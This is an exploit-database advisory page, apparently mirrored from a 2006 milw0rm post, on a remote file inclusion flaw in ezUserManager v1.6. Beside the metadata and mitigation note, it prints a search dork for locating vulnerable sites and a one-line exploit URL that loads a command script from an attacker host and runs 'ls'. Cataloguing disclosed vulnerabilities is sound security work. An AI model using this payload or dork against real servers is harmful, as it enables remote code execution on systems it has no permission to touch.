header-logo
Suggest Exploit
vendor:
ezUserManager
by:
OLiBekaS
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: ezUserManager
Affected Version From: v1.6
Affected Version To: v1.6
Patch Exists: YES
Related CWE: N/A
CPE: a:ezusermanager:ezusermanager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

ezUserManager <= v1.6 Remote File Inclusion Vulnerability

A vulnerability in ezUserManager <= v1.6 allows remote attackers to include arbitrary files via a URL in the ezUserManager_Path parameter to ezusermanager_pwd_forgott.php.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.
Source

Exploit-DB raw data:

Title       : ezUserManager <= v1.6 Remote File Inclusion Vulnerability
-
URL         : http://www.ezusermanager.com/
-
Dork        : "powered by ezUserManager"
-
Author      : OLiBekaS
-
contact     : olibekas[at]gmail.com
-
greetz      : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
Exploit     : http://[target]/[path]/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://[attacker]/cmd.txt?&cmd=ls

# milw0rm.com [2006-05-15]

Navigation

Suggest Exploit

Services By CQR